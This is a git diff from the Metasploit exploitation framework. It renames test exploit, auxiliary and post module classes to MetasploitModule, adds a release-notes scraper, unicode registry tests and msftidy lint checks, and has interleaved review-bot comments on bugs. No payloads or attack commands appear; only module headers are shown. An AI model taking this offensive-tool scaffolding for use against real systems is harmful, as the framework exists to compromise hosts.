"MS15-093", - "search.mshattr.sarticletitle": "Security Update for Internet Explorer", - "search.mshattr.sarticledate": "2015-08-20", - "search.mshattr.sarticleseverity": "Critical", - "search.mshattr.sarticleversion": "1.1", - "search.mshattr.sarticlerevisionnote": "", - "search.mshattr.sarticleseosummary": "", - "search.mshattr.skbnumber": "3088903", - "search.mshattr.prefix": "MSRC", - "search.mshattr.topictype": "kbOrient", - "search.mshattr.preferredlib": "/library/security", - "search.mshattr.preferredsitename": "TechNet", - "search.mshattr.docsettitle": "MSRC Document", - "search.mshattr.docsetroot": "Mt404691", - "search.save": "history", - "search.microsoft.help.id": "ms15-093", - "search.description": "", - 
"search.mscategory": "dn567670", - "search.mscategoryv": "dn567670Security10", - "search.tocnodeid": "mt404691", - "mshkeyworda": "ms15-093", - "mshattr": "AssetID:ms15-093", - "save": "history", - "microsoft.help.id": "ms15-093" - } - ] - } - } - ] -} - | - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - res - } - end - - let(:expected_msb) do - 'ms15-093' - end - - describe '#find_msb_numbers' do - it 'returns an array of msb numbers' do - results = google_msb_search.find_msb_numbers(expected_msb) - expect(results).to be_kind_of(Array) - expect(results).to eq([expected_msb]) - end - end - - describe '#search' do - it 'returns a hash (json data)' do - results = google_msb_search.search(starting_index: 1) - expect(results).to be_kind_of(Hash) - end - end - - describe '#parse_results' do - it 'returns a hash (json data)' do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - - results = google_msb_search.parse_results(res) - expect(results).to be_kind_of(Hash) - end - end - - describe '#get_total_results' do - it 'returns a fixnum' do - total = google_msb_search.get_total_results(JSON.parse(json_data)) - expect(total).to be_kind_of(Fixnum) - end - end - - describe '#get_next_index' do - it 'returns a fixnum' do - i = google_msb_search.get_next_index(JSON.parse(json_data)) - expect(i).to be_kind_of(Fixnum) - end - end - - end - - describe MicrosoftPatchFinder::Driver do - - let(:msb) do - 'ms15-100' - end - - let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - before(:example) do - opts = { keyword: msb } - allow(MicrosoftPatchFinder::OptsConsole).to 
receive(:get_parsed_options).and_return(opts) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:download_advisory).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_details_aspx).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_page).and_return(Rex::Proto::Http::Response.new) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:get_download_links).and_return([expected_link]) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::Driver).to receive(:print_error) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::PatchLinkCollector).to receive(:print_error) - end - - subject(:driver) do - MicrosoftPatchFinder::Driver.new - end - - describe '#get_download_links' do - it 'returns an array of links' do - results = driver.get_download_links(msb) - expect(results).to be_kind_of(Array) - expect(results.first).to eq(expected_link) - end - end - - describe '#google_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers') - end - end - - describe '#technet_search' do - it 'returns search results' do - skip('See rspec for MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers') - end - end - - end - -end diff --git a/spec/tools/virustotal_spec.rb b/spec/tools/virustotal_spec.rb index ce9d04f023..09803e5406 100644 --- a/spec/tools/virustotal_spec.rb +++ b/spec/tools/virustotal_spec.rb 
@@ -172,19 +172,6 @@ RSpec.describe VirusTotalUtility do describe VirusTotalUtility::Driver do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before do $stdin = StringIO.new("Y\n") end diff --git a/test/modules/auxiliary/test/capture.rb b/test/modules/auxiliary/test/capture.rb index 4e05e343fc..7635dd4e0c 100644 --- a/test/modules/auxiliary/test/capture.rb +++ b/test/modules/auxiliary/test/capture.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/check.rb b/test/modules/auxiliary/test/check.rb index dbcb353284..09138e7dcb 100644 --- a/test/modules/auxiliary/test/check.rb +++ b/test/modules/auxiliary/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/auxiliary/test/eth_spoof.rb b/test/modules/auxiliary/test/eth_spoof.rb index 087adf1282..c20f1d5ffe 100644 --- a/test/modules/auxiliary/test/eth_spoof.rb +++ b/test/modules/auxiliary/test/eth_spoof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/ftp_data.rb b/test/modules/auxiliary/test/ftp_data.rb index 8f22c67c49..d0b28c0421 100644 --- a/test/modules/auxiliary/test/ftp_data.rb +++ b/test/modules/auxiliary/test/ftp_data.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp 
diff --git a/test/modules/auxiliary/test/heaplib2.rb b/test/modules/auxiliary/test/heaplib2.rb index d50c432964..c1e9a0cbae 100644 --- a/test/modules/auxiliary/test/heaplib2.rb +++ b/test/modules/auxiliary/test/heaplib2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 8fc667d5c4..2da0069f68 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/test/modules/auxiliary/test/ip_spoof.rb b/test/modules/auxiliary/test/ip_spoof.rb index 50dc2f8ef4..dcb670d582 100644 --- a/test/modules/auxiliary/test/ip_spoof.rb +++ b/test/modules/auxiliary/test/ip_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/recon_passive.rb b/test/modules/auxiliary/test/recon_passive.rb index dfd7a23b8e..11ec7c313b 100644 --- a/test/modules/auxiliary/test/recon_passive.rb +++ b/test/modules/auxiliary/test/recon_passive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb index 256f549059..f93e01cc95 100644 --- a/test/modules/auxiliary/test/report_auth_info.rb +++ b/test/modules/auxiliary/test/report_auth_info.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary FAKE_IP = '192.168.12.123' FAKE_PORT = 80 diff --git a/test/modules/auxiliary/test/scanner_batch.rb b/test/modules/auxiliary/test/scanner_batch.rb index d9e8a346d7..120b02783b 100644 --- a/test/modules/auxiliary/test/scanner_batch.rb +++ b/test/modules/auxiliary/test/scanner_batch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_host.rb b/test/modules/auxiliary/test/scanner_host.rb index 2f9ff8475e..4ff7dd85b2 100644 --- a/test/modules/auxiliary/test/scanner_host.rb +++ b/test/modules/auxiliary/test/scanner_host.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_range.rb b/test/modules/auxiliary/test/scanner_range.rb index 76210a771d..9c3f192320 100644 --- a/test/modules/auxiliary/test/scanner_range.rb +++ b/test/modules/auxiliary/test/scanner_range.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/space-check.rb b/test/modules/auxiliary/test/space-check.rb index fea0b6870b..aaa7ae5f5a 100644 --- a/test/modules/auxiliary/test/space-check.rb +++ b/test/modules/auxiliary/test/space-check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/exploits/test/aggressive.rb b/test/modules/exploits/test/aggressive.rb index 293301faa3..f989bac288 100644 --- a/test/modules/exploits/test/aggressive.rb +++ b/test/modules/exploits/test/aggressive.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb index dc38645d7a..1ccd6ffadf 100644 --- a/test/modules/exploits/test/browserexploitserver.rb +++ b/test/modules/exploits/test/browserexploitserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/check.rb b/test/modules/exploits/test/check.rb index 2b2aaf2ab5..5520014680 100644 --- a/test/modules/exploits/test/check.rb +++ b/test/modules/exploits/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit def initialize(info = {}) super(update_info(info, diff --git a/test/modules/exploits/test/cmdweb.rb b/test/modules/exploits/test/cmdweb.rb index ecf80239cb..22cd334e90 100644 --- a/test/modules/exploits/test/cmdweb.rb +++ b/test/modules/exploits/test/cmdweb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/test/modules/exploits/test/dialup.rb b/test/modules/exploits/test/dialup.rb index c5a662edd2..edd7a228ee 100644 --- a/test/modules/exploits/test/dialup.rb +++ b/test/modules/exploits/test/dialup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Dialup diff --git a/test/modules/exploits/test/egghunter.rb b/test/modules/exploits/test/egghunter.rb index 7c4ca444c6..6da35c4bcf 100644 
--- a/test/modules/exploits/test/egghunter.rb +++ b/test/modules/exploits/test/egghunter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb index dd92b9309c..8505eaa529 100644 --- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb index 9ac473a9c4..2715bd6a15 100644 --- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/exploitme.rb b/test/modules/exploits/test/exploitme.rb index 7a728b1a1b..f07278feeb 100644 --- a/test/modules/exploits/test/exploitme.rb +++ b/test/modules/exploits/test/exploitme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/java_tester.rb b/test/modules/exploits/test/java_tester.rb index 654901ffc2..ae1602c66f 100644 --- a/test/modules/exploits/test/java_tester.rb +++ b/test/modules/exploits/test/java_tester.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking def initialize( info = {} ) diff --git a/test/modules/exploits/test/js_tester.rb b/test/modules/exploits/test/js_tester.rb index 3483c27d10..e264e61b45 100644 --- a/test/modules/exploits/test/js_tester.rb +++ b/test/modules/exploits/test/js_tester.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/exploits/test/kernel.rb b/test/modules/exploits/test/kernel.rb index 5ca63ed3a4..1848e44631 100644 --- a/test/modules/exploits/test/kernel.rb +++ b/test/modules/exploits/test/kernel.rb @@ -8,7 +8,7 @@ require 'msf/core' # # This is a test exploit for testing kernel-mode payloads. # -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Udp diff --git a/test/modules/exploits/test/shell.rb b/test/modules/exploits/test/shell.rb index a961d3cbf8..237a48b484 100644 --- a/test/modules/exploits/test/shell.rb +++ b/test/modules/exploits/test/shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/post/test/extapi.rb b/test/modules/post/test/extapi.rb index 3323bc8ad6..0b25fb123d 100644 --- a/test/modules/post/test/extapi.rb +++ b/test/modules/post/test/extapi.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 798b183b99..e38a99d1ac 100644 
--- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -8,7 +8,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/file.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/get_env.rb b/test/modules/post/test/get_env.rb index 32dcb9376f..c70d61de96 100644 --- a/test/modules/post/test/get_env.rb +++ b/test/modules/post/test/get_env.rb @@ -7,7 +7,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/common.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/meterpreter.rb b/test/modules/post/test/meterpreter.rb index 005725c3cc..a4a8d5c95e 100644 --- a/test/modules/post/test/meterpreter.rb +++ b/test/modules/post/test/meterpreter.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index 7b2c1f6daa..be93bd2809 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Railgun diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index 89bf6415e6..cd1e9c4fce 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb 
@@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Registry @@ -126,7 +126,6 @@ class Metasploit3 < Msf::Post ret end - it "should write REG_DWORD values" do ret = true registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") @@ -154,6 +153,41 @@ class Metasploit3 < Msf::Post ret end + it "should create unicode keys" do + ret = registry_createkey(%q#HKCU\σονσλυσιονεμκυε#) + end + + it "should write REG_SZ unicode values" do + ret = true + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str", "дэлььякатезшимя", "REG_SZ") + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + if (valinfo.nil?) + ret = false + else + # type == REG_SZ means string + ret &&= !!(valinfo["Type"] == 1) + ret &&= !!(valinfo["Data"].kind_of? String) + ret &&= !!(valinfo["Data"] == "дэлььякатезшимя") + end + + ret + end + + + it "should delete unicode keys" do + ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + # getvalinfo should return nil for a non-existent key + ret &&= (valinfo.nil?) + ret &&= registry_deletekey(%q#HKCU\σονσλυσιονεμκυε#) + # Deleting the key should delete all its values + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword") + ret &&= (valinfo.nil?) + + ret + end + end end diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index d5c9c9dff5..0a4531f076 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb 
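Review bot: In "should write REG_SZ unicode values" the `test_val_dword` write is never read back, so the last check in "should delete unicode keys" (that `test_val_dword` is gone once the key is deleted) passes even if that value was never created. Reading it back where it is written makes the later assertion meaningful, for example `ret &&= !registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword").nil?` just before `ret` is returned. The third example is titled "should delete unicode keys" but its first assertion covers `registry_deleteval`, so a failure there is reported under a misleading name. The key name is also repeated as a literal in every call across the three examples; one constant would keep them in step. The enclosing class body starts and ends outside this hunk.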
@@ -10,7 +10,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb index e862a388d8..95560225c1 100644 --- a/test/modules/post/test/unix.rb +++ b/test/modules/post/test/unix.rb @@ -9,7 +9,7 @@ require 'module_test' #load 'lib/msf/core/post/linux/system.rb' #load 'lib/msf/core/post/unix/enum_user_dirs.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Linux::System diff --git a/tools/dev/find_release_notes.rb b/tools/dev/find_release_notes.rb new file mode 100644 index 0000000000..fbd073a5ae --- /dev/null +++ b/tools/dev/find_release_notes.rb 
@@ -0,0 +1,159 @@ +#!/usr/bin/env ruby + +require 'net/http' +require 'nokogiri' +require 'thread' + +module ReleaseNotesFinder + # This finds the release notes information based on either: + # 1. A PR number. In release notes, PR numbers are for bug fixes and notable changes. + # 2. A module short name. For example: ms08_067_netapi + class Client + attr_accessor :release_notes + + RELEASE_NOTES_PAGE = 'https://community.rapid7.com/docs/DOC-2918'.freeze + + def initialize + init_release_notes + @mutex = Mutex.new + end + + def add_release_notes_entry(row) + td = row.search('td') + release_notes_link = td[0] && td[0].at('a') ? td[0].at('a').attributes['href'].value : '' + release_notes_num = td[0] && td[0].at('a') ? td[0].at('a').text.scan(/\d{10}/).flatten.first || '' : '' + highlights = td[1] ? (td[1].search('span') || []).map { |e| e.text } * " " : '' + update_link = td[2] && td[2].at('a') ? td[2].at('a').attributes['href'].value : '' + + @release_notes << { + release_notes_link: release_notes_link, + release_notes_num: release_notes_num, + highlights: highlights, + update_link: update_link, + pull_requests: [], + new_modules: [] + } + end + + def init_release_notes + self.release_notes = [] + + html = send_http_request(RELEASE_NOTES_PAGE) + table_rows_pattern = 'div[@id="jive-body-main"]//div//section//div//div[@class="j-rte-table"]//table//tbody//tr' + rows = html.search(table_rows_pattern) + rows.each do |row| + add_release_notes_entry(row) + end + end + + def update_pr_list(n, text) + pr_num, desc = text.scan(/#(\d+).\x20*(.+)/).flatten + return unless pr_num + n[:pull_requests] << { id: pr_num, description: desc } + end + + def update_module_list(n, li) + li.search('a').each do |a| + next if a.attributes['href'].nil? 
+ n[:new_modules] << { link: a.attributes['href'].value } + end + end + + def update_release_notes_entry(n) + html = send_http_request(n[:release_notes_link]) + pattern = '//div[@class="jive-rendered-content"]//ul//li' + html.search(pattern).each do |li| + @mutex.synchronize do + update_pr_list(n, li.text) + update_module_list(n, li) + end + end + end + + def get_release_notes(input) + release_notes.each do |n| + if n[:pull_requests].empty? + update_release_notes_entry(n) + end + + input_type = guess_input_type(input) + + case input_type + when :pr + m = get_release_notes_from_pr(n, input) + when :module_name + m = get_release_notes_from_module_name(n, input) + end + + return m if m + end + + nil + end + + def guess_input_type(input) + input =~ /^\d+/ ? :pr : :module_name + end + + def get_release_notes_from_module_name(n, input) + n[:new_modules].each do |m| + return n if m[:link] && m[:link].include?(input) + end + + nil + end + + def get_release_notes_from_pr(n, pr) + n[:pull_requests].each do |p| + return n if p[:id] && pr == p[:id] + end + + nil + end + + def send_http_request(uri) + url = URI.parse(uri) + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + Nokogiri::HTML(res.body) + end + end +end + +def main + inputs = [] + + ARGV.length.times { inputs << ARGV.shift } + puts "[*] Enumerating release notes..." 
+ cli = ReleaseNotesFinder::Client.new + puts "[*] Finding release notes for items: #{inputs * ', '}" + threads = [] + begin + inputs.each do |input| + t = Thread.new do + n = cli.get_release_notes(input) + puts "\n" + + if n + puts "[*] Found release notes for: #{input}" + puts "Release Notes Number: #{n[:release_notes_num]}" + puts "Release Notes Link: #{n[:release_notes_link] || 'N/A'}" + puts "Update Link: #{n[:update_link] || 'N/A'}" + puts "Highlights:\n#{n[:highlights]}" + else + puts "[*] Unable to find release notes for: #{input}" + end + end + threads << t + end + threads.each { |t| t.join } + ensure + threads.each { |t| t.kill } + end +end + +if __FILE__ == $PROGRAM_NAME + main +end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 1f17891ccd..eb294cd2f0 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -65,6 +65,7 @@ class Msftidy def initialize(source_file) @full_filepath = source_file + @module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1] @source = load_file(source_file) @lines = @source.lines # returns an enumerator @status = OK 
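Review bot: `update_release_notes_entry` passes `n[:release_notes_link]` straight to `send_http_request`, but `add_release_notes_entry` stores `''` when a table row has no anchor and otherwise stores whatever `href` the scraped page carried. An empty or relative link gives `URI.parse` no host, so `Net::HTTP.new(url.host, url.port)` fails inside a worker thread, and an absolute link is followed to whichever host it names. A guard such as `return if n[:release_notes_link].to_s.empty?` in `update_release_notes_entry`, plus `raise ArgumentError, "unexpected URL: #{uri}" unless url.is_a?(URI::HTTPS)` in `send_http_request`, keeps the tool to HTTPS links it can fetch; comparing `url.host` with the host of `RELEASE_NOTES_PAGE` would be stricter still. Separately, `guess_input_type` uses `/^\d+/`, which treats any input that merely starts with a digit as a PR number, while `get_release_notes_from_pr` compares with `==`; `/\A\d+\z/` matches that intent.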
@@ -464,13 +465,40 @@ class Msftidy def check_bad_terms # "Stack overflow" vs "Stack buffer overflow" - See explanation: # http://blogs.technet.com/b/srd/archive/2009/01/28/stack-overflow-stack-exhaustion-not-the-same-as-stack-buffer-overflow.aspx - if @source =~ /class Metasploit\d < Msf::Exploit::Remote/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + if @module_type == 'exploit' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack buffer overflow"?') - elsif @source =~ /class Metasploit\d < Msf::Auxiliary/ and @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i + elsif @module_type == 'auxiliary' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i warn('Contains "stack overflow" You mean "stack exhaustion"?') end end + def check_bad_super_class + # skip payloads, as they don't have a super class + return if @module_type == 'payloads' + + # get the super class in an ugly way + unless (super_class = @source.scan(/class Metasploit(?:\d|Module)\s+<\s+(\S+)/).flatten.first) + error('Unable to determine super class') + return + end + + prefix_super_map = { + 'auxiliary' => /^Msf::Auxiliary$/, + 'exploits' => /^Msf::Exploit(?:::Local|::Remote)?$/, + 'encoders' => /^(?:Msf|Rex)::Encoder/, + 'nops' => /^Msf::Nop$/, + 'post' => /^Msf::Post$/ + } + + if prefix_super_map.key?(@module_type) + unless super_class =~ prefix_super_map[@module_type] + error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}") + end + else + warn("Unexpected and potentially incorrect super class found ('#{super_class}')") + end + end + def check_function_basics functions = @source.scan(/def (\w+)\(*(.+)\)*/) 
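Review bot: `check_bad_terms` compares `@module_type` with `'exploit'`, but `initialize` captures the directory name under `modules/`, which `prefix_super_map` in this same hunk spells `'exploits'`. The first branch therefore looks unreachable, and exploit modules would no longer get the "stack buffer overflow" hint. The condition should read `if @module_type == 'exploits' && @source.gsub("\n", "") =~ /stack[[:space:]]+overflow/i`. In `check_bad_super_class` the `error(...)` message opens a parenthesis before "found" and never closes it. `@module_type` is also nil for a file outside any `modules/` directory, so such a file reaches the "Unable to determine super class" error or the "Unexpected and potentially incorrect super class" warning; an early `return if @module_type.nil?` would avoid that if it is not intended.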
@@ -481,6 +509,12 @@ class Msftidy end end + def check_bad_class_name + if @source =~ /^\s*class (Metasploit\d+)\s*</ + warn("Please use 'MetasploitModule' as the class name (you used #{Regexp.last_match(1)})") + end + end + def check_lines url_ok = true no_stdio = true @@ -557,7 +591,7 @@ class Msftidy end # Auxiliary modules do not have a rank attribute - if ln =~ /^\s*Rank\s*=\s*/ and @source =~ /<\sMsf::Auxiliary/ + if ln =~ /^\s*Rank\s*=\s*/ && @module_type == 'auxiliary' warn("Auxiliary modules have no 'Rank': #{ln}", idx) end @@ -652,6 +686,41 @@ class Msftidy end end + # + # Run all the msftidy checks. + # + def run_checks + check_mode + check_shebang + check_nokogiri + check_rubygems + check_ref_identifiers + check_old_keywords + check_verbose_option + check_badchars + check_extname + check_old_rubies + check_ranking + check_disclosure_date + check_title_casing + check_bad_terms + check_bad_super_class + check_bad_class_name + check_function_basics + check_lines + check_snake_case_filename + check_comment_splat + check_vuln_codes + check_vars_get + check_newline_eof + check_sock_get + check_udp_sock_get + check_invalid_url_scheme + check_print_debug + check_register_datastore_debug + check_use_datastore_debug + end + private def load_file(file) 
